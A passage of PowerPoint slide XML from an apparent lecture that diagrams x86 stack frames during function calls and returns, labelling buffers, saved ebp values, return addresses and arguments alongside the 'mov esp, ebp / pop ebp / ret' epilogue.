          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4130675" y="4419600"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64543" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2360613"/>
            <a:ext cx="304800" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64544" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1979613"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a: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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39125872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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65540" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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65542" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65543" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="40671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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65544" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65545" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65546" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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65547" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65548" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="55911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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65549" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65550" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59118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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65551" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="25590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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65552" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65553" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="48910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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65554" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65555" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65539" idx="3"/>
            <a:endCxn id="65544" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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65556" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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5557" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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5558" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833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5559" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65560" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65547" idx="3"/>
            <a:endCxn id="65548" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>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65561" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65562" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="65561" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65563" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65564" idx="3"/>
            <a:endCxn id="65545" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4648200" y="4829175"/>
            <a:ext cx="381000" cy="31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5564" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4054475" y="4648200"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65565" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65566" idx="3"/>
            <a:endCxn id="65550" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4632325" y="6064250"/>
            <a:ext cx="396875" cy="158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5566" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5881688"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65567" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="2514600"/>
            <a:ext cx="304800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65568" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2133600"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a: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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428826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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>f()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66564" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66565" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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66566" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66567" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="40671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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66568" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66569" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66570" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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66571" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66572" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="55911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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66573" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66574" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59118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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66575" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="25590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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66576" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66577" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="48910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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66578" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66579" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="66563" idx="3"/>
            <a:endCxn id="66568" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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66580" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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6581" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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6582" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833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6583" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66584" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="66571" idx="3"/>
            <a:endCxn id="66572" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>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66585" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66586" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="66585" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66587" name="AutoShape 27"/>
